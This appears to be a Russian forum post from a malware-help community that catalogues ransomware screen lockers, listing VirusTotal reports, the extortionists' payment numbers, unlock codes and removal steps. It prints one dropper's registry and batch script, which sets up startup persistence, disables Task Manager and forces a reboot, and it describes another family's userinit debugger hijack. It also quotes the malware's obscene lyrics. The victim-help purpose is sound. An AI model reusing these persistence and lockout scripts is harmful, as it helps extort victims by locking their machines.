Как уе...у с...ка

http://www.virustotal.com/file-scan/report.html?id=4ba85a918f5b41cc2a9a964b6180a693f676dd87cafe8ca39b173fdda451d8d8-1318861830

дропер(rar sfx) md5: 4ED4EACA0EAD5607A6F65563FF89E632
винлок md5: 958DD0E63C640B778399DA084CBA2893

В архиве
sttix.reg

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"sttix"="C:\\WINDOWS\\sttix.exe"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system]
"DisableTaskMgr"=dword:00000001
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\system]
"DisableTaskMgr"=dword:00000001

sttix.cmd

copy /Y sttix.exe %SystemRoot%\*.*
regedit /s "sttix.reg"
shutdown /r

sttix.exe


лежит здесь http://rghost.ru/2589771*

Особенности заражения этим винлоком
-копирует себя в c:\windows\sttix.exe
-прописывается в реестре
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
"sttix"=C:\WINDOWS\sttix.exe
-отключает диспетчер задач
-закрыть его можно нажав комбинацию клавиш Alt+F4
-в фоне играем милая песенка со словами ;)
Ты Пидр бля..Пидр
Как уебу сука
Это наша точка


Чтобы восстановить диспетчер задач удалите ключ реестра

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system]
"DisableTaskMgr"=dword:00000001
или измените на 00000000

Trojan.Winlock.3333 на номер U115116195580

http://www.virustotal.com/file-scan/report.html?id=36c7bffcd616e696d73c7bdaed5c5d0fe4e198824ef17d1bcfad7074efecef27-1318770724



U115116195580

код: 424440081830197

Trojan.Winlock.3333 на номер 8-(910)-712-36-30

http://www.virustotal.com/file-scan/report.html?id=ef64bce9ef42d7775e4a3e425d57e9b950d839e37a8900ab3dde099a90dfd26f-1318368246


8-(910)-712-36-30
89107123630
код: 973202728126666

Trojan.MBRlock.12 на номер 079099552636

http://www.virustotal.com/file-scan/report.html?id=f9779eeae006058518cf68ea13fb693b08091e489ff9c70c8a65c2ae164aee9c-1318846820


номер 079099552636
код: 70083421

Грузимся с Paragon Partition Manager....Код видно невооруженным глазом.

Как удалить без ввода кода

инструкция: http://rghost.ru/21429711
видео: http://rghost.ru/7215991

Иногда помогает перевод даты в биосе на 1 год вперед

Trojan.Winlock.3333 на номер 8-(910)-782-49-72

http://www.virustotal.com/file-scan/report.html?id=ed382b26e34df1b53c8695e124ba9eafda8a1e088f49aa169d75846764168f75-1318254222


89107824972
8-(910)-782-49-72

код: 796638526616001

Я ж не Малевич

И как мне его теперь? Замазать все черным квадратом?

P.S.

Люблю mail.ru за его суппорт....У которого нет даже желания разобраться.

Все равно это порно.

Trojan.Winlock.4305 на номер U346370806414

http://www.virustotal.com/file-scan/report.html?id=af443ee8f706edbe600d5b5d1c9e3b0851c0cfc3a6e7ab02af4989bb8a1e56f1-1318245252

U346370806414
U349966071813
U242638349276
U245702517080
U650435878711
U138860926215
код:socks

Trojan.Winlock.3333 на номер 8-(915)-632-91-89

http://www.virustotal.com/file-scan/report.html?id=02665c662dbd36531b2b68d4ad1fdc158cbfe91eeb1caa630b428e809085227e-1317034964



8-(915)-632-91-89
код: 438762247763348

Trojan.Winlock.4089 на номер U810707725895

http://www.virustotal.com/file-scan/report.html?id=ccda4c35cdcc09fe8ad6ed60c2301c4c3602a72d65f8035c374816b3fb3648ee-1318053507

U810707725895
нет кода разблокировки

Trojan.Winlock.3020 на номер U205144059589

http://www.virustotal.com/file-scan/report.html?id=416dbf470f9118762448204a4ef1c66b4965ae3245780202aaf8e1eb4fea625e-1318342097


U205144059589
код: proxy21

"Antivirus-Defence Project 2011" на номер +7 (911) 950 87 23

http://www.virustotal.com/file-scan/report.html?id=5d964d0c08abf9332958bb6ff085662f9fd387b72890819c3490afb666b1c825-1318523619


Это один в один Trojan.Siggen3.1694
Ручками по инструкции http://rghost.ru/19087081



+7 (981) 124 76 59
+7 (911) 950 87 23

Особенности заражения этим видом Винлока.

-У этого баннера нет кода разблокировки.
-Как правило садиться в папку c:\Windows\TEMP
-Прописывается в реестре
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\userinit.exe]
"Debugger"="c:\Windows\Temp\имя_файла.exe"
-Создает ключи в реестре с именем AdobeUpdater
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"AdobeUpdater"="C:\WINDOWS\Temp\имя_файла.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"AdobeUpdater"="C:\WINDOWS\Temp\имя_файла.exe" 

В данном случае имя файла C:\WINDOWS\Temp\iefl.exe

Trojan.Winlock.3333 на номер 89107125076

http://www.virustotal.com/file-scan/report.html?id=e67586a30b78d45dd1952a39d4072d40a2ab80573b09d9a4960c88757bc87d7a-1317214508


89107125076
код: 531343697170497

Trojan-Spy.Win32.Zbot.cdin

http://www.virustotal.com/file-scan/report.html?id=e2e6558b7462f82621a5513198b3baaf604a6df26734d5a2183a88633da979d9-1315382104


U237595538742
U362824287073
код:   kl;kl;

Trojan.Winlock.3333 номер 89156493181

http://www.virustotal.com/file-scan/report.html?id=a1a3756a4d2ac780fb26474eb3ffc75fa371ce248bcb4c55d5f0bdefcf13f5c0-1318251380


89156493181
8-(915)-649-31-81
код: 512414683900558

Разблокируем без кода.
Перезагружаем машину и выбираем особый пункт загрузки.
Для этого во время загрузки системы нажимаем клавишу F8 (нажимаем и долго держим).

Выбираем пункт " Восстановление службы каталогов (только на контроллере домена Windows)"
Нажимаем Энтер

Trojan.Winlock.3333 номер U226505371253

http://www.virustotal.com/file-scan/report.html?id=596add8ad4ccb23923eb326ebdd124f5b5d294f1529b010099782602c2090635-1318085728



U226505371253
код: 916107488094443

Разблокируем без кода.
Перезагружаем машину и выбираем особый пункт загрузки.
Для этого во время загрузки системы нажимаем клавишу F8 (нажимаем и долго держим).

Выбираем пункт " Восстановление службы каталогов (только на контроллере домена Windows)"
Нажимаем Энтер

Trojan-Dropper.Win32.VB.bdbg

http://www.virustotal.com/file-scan/report.html?id=4e7d64799126f0e830d6b653119015454bda44741bc5aedc9dbf26a1937a198a-1318177304
Это один в один Trojan.Siggen3.1694
Ручками по инструкции http://rghost.ru/19087081

Особенности заражения этим видом Винлока.

-У этого баннера нет кода разблокировки.
-Как правило садиться в папку c:\Windows\TEMP
-Прописывается в реестре
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\userinit.exe]
"Debugger"="c:\Windows\Temp\имя_файла.exe"
-Создает ключи в реестре с именем AdobeUpdater
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"AdobeUpdater"="C:\WINDOWS\Temp\имя_файла.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"AdobeUpdater"="C:\WINDOWS\Temp\имя_файла.exe" 

В данном случае имя файла C:\WINDOWS\Temp\iefl.exe

+7 (911) 950 89 25
+7 (911) 729 40 75
+7 (911) 164 16 69
+7 (911) 950 89 25
+7 (911) 729 40 75

+7 (911) 164 18 41
+7 (911) 164 16 73
+7 (911) 941 30 37
+7 (911) 164 18 41
+7 (911) 164 16 73


нет кода разблокировки

Trojan.Win32.Heur.087

http://www.virustotal.com/file-scan/report.html?id=6d1c599a52eb1fb4ae21c55970e229f8cb6c6c516ca6470af4a906e1b1051a6f-1316708850


U182973738465
U307475667103
U279316811364
U329181263209
код: sdfsdf

Trojan.Winlock.3333 номер 89190422992

http://www.virustotal.com/file-scan/report.html?id=0487ff10a32a1e05b640ff26beae2ec2ab5ebcbf677bc0b9de42d49f59ee2a1e-1317429536



89190422992
код: 727275750563515

Разблокируем без кода.
Перезагружаем машину и выбираем особый пункт загрузки.
Для этого во время загрузки системы нажимаем клавишу F8 (нажимаем и долго держим).


Выбираем пункт " Восстановление службы каталогов (только на контроллере домена Windows)"
Нажимаем Энтер

Trojan.MbrLock номер 079651735759

http://www.virustotal.com/file-scan/report.html?id=021fa7fc0962f267cdb4fc58d051c8373717038e68c7917071e1eceefcee99c8-1318156788



079651735759
код: 200199571

Trojan.Winlock.3333 номер 89156506726

не помню..вроде был этот

http://www.virustotal.com/file-scan/report.html?id=10ae3ba7a67296c7c531f5fbe0dda1b54a17a8c0b4c8ee953d54b8919344e4e7-1316398902


89156506726
8-(915)-650-67-26
код: 7305

Разблокируем без кода.
Перезагружаем машину и выбираем особый пункт загрузки.
Для этого во время загрузки системы нажимаем клавишу F8 (нажимаем и долго держим).

Выбираем пункт " Восстановление службы каталогов (только на контроллере домена Windows)"
Нажимаем Энтер

Trojan.WinLock.3333 номер 89190422612

http://www.virustotal.com/file-scan/report.html?id=926e18dc4ebb1d960edb491cabb6d132af7861bc34cc79e2f56a7516f2f62e24-1318074500




89190422612
код: 924166164773205

Достаем код от мбрлоков, созданных MbrLock Builder v02

Этап № 1

- грузимся с какого-нибудь виндового лайфсд (зверя,алкида)
- запускаем HDHacker (by Dimio)
- щелкаем по Phisical Drive (на рис. под цифрой 1)
- нажимаем кнопку Read sector from Disk (на рис. под цифрой 2)
- нажимаем кнопку Save sector to File (на рис. под цифрой 3)

- сохраняем дамп MBR

Этап № 2

- запускаем утилиту UnXor от thyrex

- нажимаем Загрузить MBR

- выбираем сохраненный дамп mbr

А вот и код разблокировки

Полезные ссылки: MbrLock Builder v01

Trojan.Winlock.3020 номер U317415249998

http://www.virustotal.com/file-scan/report.html?id=77e3b7ade56b8c1f9e89517a5e965459376c6b956db234994c9b4ab73888ceae-1316877946


U317415249998
код:910910910

Trojan.Win32.Heur.087 номер U408643631972

http://www.virustotal.com/file-scan/report.html?id=7700ae8a6cdc51e4407220783943c71a1a97329ca6050bf811b672d9ca17d0e1-1317023329

U408643631972

код:   .;[.;[